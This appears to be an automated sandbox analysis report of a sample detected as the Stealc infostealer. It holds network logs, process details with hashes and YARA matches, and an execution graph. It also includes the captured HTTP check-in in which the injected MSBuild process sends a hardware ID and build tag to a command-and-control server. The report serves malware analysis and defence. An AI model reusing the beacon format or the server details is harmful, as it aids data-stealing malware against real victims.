                                              Oct 7, 2024 18:46:23.567862034 CEST49729443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.568094015 CEST49729443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.568106890 CEST4434972913.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.568116903 CEST49729443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.568123102 CEST4434972913.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.570571899 CEST49733443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.570596933 CEST4434973313.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.570759058 CEST49733443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.570981979 CEST49733443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.570995092 CEST4434973313.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.571192026 CEST49734443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.571202040 CEST4434973413.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.571271896 CEST49734443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.571417093 CEST49734443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.571425915 CEST4434973413.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.580358982 CEST4434973013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.580424070 CEST4434973013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.580471992 CEST49730443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.580746889 CEST49730443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.580756903 CEST4434973013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.580773115 CEST49730443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.580777884 CEST4434973013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.583758116 CEST49735443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.583821058 CEST4434973513.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.583895922 CEST49735443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.584096909 CEST49735443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.584125042 CEST4434973513.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.586873055 CEST4434973113.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.586926937 CEST4434973113.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.586968899 CEST49731443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.587105989 CEST49731443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.587121964 CEST4434973113.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.587132931 CEST49731443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.587140083 CEST4434973113.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.589807034 CEST49736443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.589829922 CEST4434973613.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.589901924 CEST49736443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.590050936 CEST49736443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.590065002 CEST4434973613.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.592736006 CEST4434972813.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.592788935 CEST4434972813.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.592830896 CEST49728443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.592981100 CEST49728443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.592993975 CEST4434972813.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.593005896 CEST49728443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.593014002 CEST4434972813.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.597059011 CEST49737443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.597083092 CEST4434973713.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.597138882 CEST49737443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.597321033 CEST49737443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.597332001 CEST4434973713.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.684663057 CEST4434973313.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.685039997 CEST49738443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.685070992 CEST4434973813.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.685137033 CEST49738443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.685574055 CEST49738443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.685584068 CEST4434973813.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.686362028 CEST4434973413.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.686614037 CEST49739443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.686639071 CEST4434973913.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.686698914 CEST49739443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.686835051 CEST49739443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.686847925 CEST4434973913.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.688033104 CEST4434973513.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.688234091 CEST49740443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.688266993 CEST4434974013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.688321114 CEST49740443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.688524961 CEST49740443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.688539028 CEST4434974013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.689304113 CEST4434973613.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.689486980 CEST49741443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.689512968 CEST4434974113.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.689564943 CEST49741443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.689666033 CEST49741443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.689678907 CEST4434974113.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.689965963 CEST4434973713.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.690121889 CEST49742443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.690130949 CEST4434974213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.690179110 CEST49742443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.690308094 CEST49742443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.690316916 CEST4434974213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.701337099 CEST4434973813.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.702164888 CEST4434973913.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.703905106 CEST49743443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.703946114 CEST4434974313.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.704027891 CEST49743443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.704931974 CEST49744443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.704962015 CEST4434974413.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.705061913 CEST49744443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.705112934 CEST49743443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.705132961 CEST4434974313.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.705338001 CEST49744443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.705357075 CEST4434974413.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.706461906 CEST4434974213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.708029032 CEST49745443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.708125114 CEST4434974513.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.708208084 CEST49745443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.708338022 CEST49745443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.708374023 CEST4434974513.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.723351002 CEST4434974413.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.723583937 CEST49746443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.723609924 CEST4434974613.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.723674059 CEST49746443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.723721027 CEST4434974113.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.723777056 CEST49741443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.723917961 CEST49746443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.723942995 CEST4434974613.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.723948002 CEST49741443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.723964930 CEST4434974113.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.725573063 CEST49747443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.725608110 CEST4434974713.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.725683928 CEST49747443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.725964069 CEST49747443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.725975990 CEST4434974713.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.726725101 CEST4434974513.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.726893902 CEST49748443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.726927996 CEST4434974813.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.726982117 CEST49748443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.727076054 CEST49748443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.727089882 CEST4434974813.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.732773066 CEST4434974313.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.732851982 CEST49743443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.732882977 CEST49743443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.732896090 CEST4434974313.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.733040094 CEST49749443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.733077049 CEST4434974913.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.733122110 CEST49749443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.733261108 CEST49749443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.733278036 CEST4434974913.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.738272905 CEST4434974713.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.738570929 CEST49750443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.738605976 CEST4434975013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.738665104 CEST49750443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.738975048 CEST49750443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.738991976 CEST4434975013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.739659071 CEST4434974813.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.741708994 CEST49751443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.741719007 CEST4434975113.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.741789103 CEST49751443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.741965055 CEST49751443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.741976976 CEST4434975113.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.750180006 CEST4434974913.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.752835989 CEST4434975013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.755099058 CEST4434975113.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.755333900 CEST49752443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.755348921 CEST4434975213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:23.755415916 CEST49752443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.755815029 CEST49752443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:23.755827904 CEST4434975213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.476762056 CEST4434974013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.476861000 CEST49740443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.478132963 CEST49740443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.478142977 CEST4434974013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.478368044 CEST4434974013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.479155064 CEST49740443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.503094912 CEST4434975213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.503170967 CEST49752443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.504473925 CEST49752443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.504486084 CEST4434975213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.504745007 CEST4434975213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.505143881 CEST4434974613.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.505227089 CEST49746443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.505873919 CEST49752443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.506270885 CEST49746443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.506298065 CEST4434974613.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.506593943 CEST4434974613.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.507631063 CEST49746443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.523401976 CEST4434974013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.551410913 CEST4434975213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.551443100 CEST4434974613.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.595247030 CEST4434974013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.595314980 CEST4434974013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.595407009 CEST49740443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.595583916 CEST49740443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.595606089 CEST4434974013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.595618010 CEST49740443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.595623016 CEST4434974013.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.630413055 CEST4434975213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.630479097 CEST4434975213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.630620003 CEST49752443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.630796909 CEST49752443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.630816936 CEST4434975213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.630852938 CEST49752443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.630860090 CEST4434975213.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.630914927 CEST4434974613.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.630980968 CEST4434974613.107.246.64192.168.2.5
                                              Oct 7, 2024 18:46:24.633260012 CEST49746443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.633260012 CEST49746443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.633260012 CEST49746443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.933927059 CEST49746443192.168.2.513.107.246.64
                                              Oct 7, 2024 18:46:24.934021950 CEST4434974613.107.246.64192.168.2.5
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Oct 7, 2024 18:46:08.986644983 CEST1.1.1.1192.168.2.50x198No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                              Oct 7, 2024 18:46:08.986644983 CEST1.1.1.1192.168.2.50x198No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                              Oct 7, 2024 18:46:09.614890099 CEST1.1.1.1192.168.2.50x9d35No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 7, 2024 18:46:09.614890099 CEST1.1.1.1192.168.2.50x9d35No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                              Oct 7, 2024 18:46:19.230451107 CEST1.1.1.1192.168.2.50xb329No error (0)shed.dual-low.s-part-0036.t-0009.t-msedge.nets-part-0036.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 7, 2024 18:46:19.230451107 CEST1.1.1.1192.168.2.50xb329No error (0)s-part-0036.t-0009.t-msedge.net13.107.246.64A (IP address)IN (0x0001)false
                                              • 62.204.41.150
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.54970462.204.41.150804616C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 7, 2024 18:46:05.668461084 CEST88OUTGET / HTTP/1.1
                                              Host: 62.204.41.150
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Oct 7, 2024 18:46:06.424277067 CEST203INHTTP/1.1 200 OK
                                              Date: Mon, 07 Oct 2024 16:46:06 GMT
                                              Server: Apache/2.4.52 (Ubuntu)
                                              Content-Length: 0
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Oct 7, 2024 18:46:06.468998909 CEST419OUTPOST /edd20096ecef326d.php HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBG
                                              Host: 62.204.41.150
                                              Content-Length: 219
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a
                                              Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG--
                                              Oct 7, 2024 18:46:07.014967918 CEST210INHTTP/1.1 200 OK
                                              Date: Mon, 07 Oct 2024 16:46:06 GMT
                                              Server: Apache/2.4.52 (Ubuntu)
                                              Content-Length: 8
                                              Keep-Alive: timeout=5, max=99
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 59 6d 78 76 59 32 73 3d
                                              Data Ascii: YmxvY2s=


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:12:46:04
                                              Start date:07/10/2024
                                              Path:C:\Users\user\Desktop\1f13Cs1ogc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\1f13Cs1ogc.exe"
                                              Imagebase:0xfe0000
                                              File size:505'344 bytes
                                              MD5 hash:BE961E1299E54C9A50C773DB0DC3696C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:12:46:04
                                              Start date:07/10/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              Imagebase:0xd0000
                                              File size:262'432 bytes
                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:12:46:04
                                              Start date:07/10/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              Imagebase:0x4d0000
                                              File size:262'432 bytes
                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:12:46:04
                                              Start date:07/10/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              Imagebase:0x7d0000
                                              File size:262'432 bytes
                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:12:46:05
                                              Start date:07/10/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288
                                              Imagebase:0x80000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:1.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:7.1%
                                                Total number of Nodes:197
                                                Total number of Limit Nodes:4
                                                execution_graph 32124 fe6dd6 32125 fe6de2 __FrameHandler3::FrameUnwindToState 32124->32125 32150 fe6fd2 32125->32150 32127 fe6de9 32128 fe6f3c 32127->32128 32137 fe6e13 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 32127->32137 32178 fe7922 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 32128->32178 32130 fe6f43 32179 ff103b 18 API calls CallUnexpected 32130->32179 32132 fe6f49 32180 ff0fff 18 API calls CallUnexpected 32132->32180 32134 fe6f51 32135 fe6e32 32137->32135 32140 fe6eb3 32137->32140 32174 ff1015 39 API calls 3 library calls 32137->32174 32138 fe6eb9 32162 fe2021 32138->32162 32158 fe7a37 32140->32158 32144 fe6ed5 32144->32130 32145 fe6ed9 32144->32145 32146 fe6ee2 32145->32146 32176 ff0ff0 18 API calls CallUnexpected 32145->32176 32177 fe7143 75 API calls ___scrt_uninitialize_crt 32146->32177 32149 fe6eea 32149->32135 32151 fe6fdb 32150->32151 32181 fe729c IsProcessorFeaturePresent 32151->32181 32153 fe6fe7 32182 fea1be 10 API calls 2 library calls 32153->32182 32155 fe6ff0 32155->32127 32156 fe6fec 32156->32155 32183 fea1dd 7 API calls 2 library calls 32156->32183 32184 fe8240 32158->32184 32160 fe7a4a GetStartupInfoW 32161 fe7a5d 32160->32161 32161->32138 32163 fe206a 32162->32163 32185 fe2003 GetPEB 32163->32185 32165 fe2223 32186 fe1bee 32165->32186 32170 fe273f 32172 fe1bee 70 API calls 32170->32172 32171 fe2783 32175 fe7a6d GetModuleHandleW 32171->32175 32173 fe2755 AttachConsole 32172->32173 32173->32171 32174->32140 32175->32144 32176->32146 32177->32149 32178->32130 32179->32132 32180->32134 32181->32153 32182->32156 32183->32155 32184->32160 32185->32165 32187 fe1c1a 32186->32187 32189 fe1cc0 32187->32189 32222 fe49a4 40 API calls 5 library calls 32187->32222 32196 fe1d52 32189->32196 32223 fe278c 70 API calls 3 library calls 32189->32223 32224 fe3b06 70 API calls 32189->32224 32191 fe1d62 32215 fe6ca2 32191->32215 32194 fe1d75 32197 fe1f49 32194->32197 32211 fe44af 32196->32211 32198 fe1fb9 32197->32198 32207 fe1f89 32197->32207 32200 fe6ca2 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 32198->32200 32202 fe1fcc VirtualProtect 32200->32202 32202->32170 32202->32171 32203 fe1fd0 32230 fe3b38 70 API calls 4 library calls 32203->32230 32206 fe1fda 32231 fe3b06 70 API calls 32206->32231 32207->32198 32207->32203 32227 fe28d3 40 API calls 2 library calls 32207->32227 32228 fe1d79 70 API calls codecvt 32207->32228 32229 fe3198 39 API calls _Deallocate 32207->32229 32209 fe1fe0 32232 fe3198 39 API calls _Deallocate 32209->32232 32212 fe44bc 32211->32212 32214 fe44c9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32211->32214 32225 fe1286 39 API calls 2 library calls 32212->32225 32214->32191 32216 fe6caa 32215->32216 32217 fe6cab IsProcessorFeaturePresent 32215->32217 32216->32194 32219 fe764d 32217->32219 32226 fe7610 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 32219->32226 32221 fe7730 32221->32194 32222->32187 32223->32189 32224->32189 32225->32214 32226->32221 32227->32207 32228->32207 32229->32207 32230->32206 32231->32209 32232->32198 32233 fffe10 32236 ffa34b 32233->32236 32237 ffa354 32236->32237 32239 ffa386 32236->32239 32240 ffa156 32237->32240 32261 ffa2ab 32240->32261 32246 ffa1aa 32247 ffa1b2 32246->32247 32248 ffa1c0 32246->32248 32297 ff3a49 HeapFree GetLastError __dosmaperr 32247->32297 32286 ffa3a6 32248->32286 32252 ffa199 32252->32239 32253 ffa1f8 __dosmaperr 32298 ff3a49 HeapFree GetLastError __dosmaperr 32253->32298 32254 ffa23f 32255 ffa288 32254->32255 32300 ff9dc8 39 API calls 2 library calls 32254->32300 32301 ff3a49 HeapFree GetLastError __dosmaperr 32255->32301 32257 ffa213 32257->32254 32299 ff3a49 HeapFree GetLastError __dosmaperr 32257->32299 32262 ffa2b7 __FrameHandler3::FrameUnwindToState 32261->32262 32269 ffa2d1 32262->32269 32302 feddc1 EnterCriticalSection 32262->32302 32266 ffa180 32272 ff9ed6 32266->32272 32267 ffa30d 32304 ffa32a LeaveCriticalSection std::_Lockit::~_Lockit 32267->32304 32268 ffa2e1 32268->32267 32303 ff3a49 HeapFree GetLastError __dosmaperr 32268->32303 32269->32266 32305 ff0409 39 API calls CallUnexpected 32269->32305 32306 fefe67 32272->32306 32275 ff9f09 32277 ff9f0e GetACP 32275->32277 32278 ff9f20 32275->32278 32276 ff9ef7 GetOEMCP 32276->32278 32277->32278 32278->32252 32279 ff3a83 32278->32279 32280 ff3a91 32279->32280 32281 ff3ac1 __dosmaperr 32279->32281 32282 ff3aac HeapAlloc 32280->32282 32284 ff3a95 std::_Locinfo::_Locinfo_ctor 32280->32284 32281->32246 32283 ff3abf 32282->32283 32282->32284 32283->32281 32284->32281 32284->32282 32314 ff0478 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 32284->32314 32287 ff9ed6 41 API calls 32286->32287 32288 ffa3c6 32287->32288 32290 ffa403 IsValidCodePage 32288->32290 32294 ffa43f CallUnexpected 32288->32294 32289 fe6ca2 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 32291 ffa1ed 32289->32291 32292 ffa415 32290->32292 32290->32294 32291->32253 32291->32257 32293 ffa444 GetCPInfo 32292->32293 32296 ffa41e CallUnexpected 32292->32296 32293->32294 32293->32296 32294->32289 32315 ff9faa 32296->32315 32297->32252 32298->32252 32299->32254 32300->32255 32301->32252 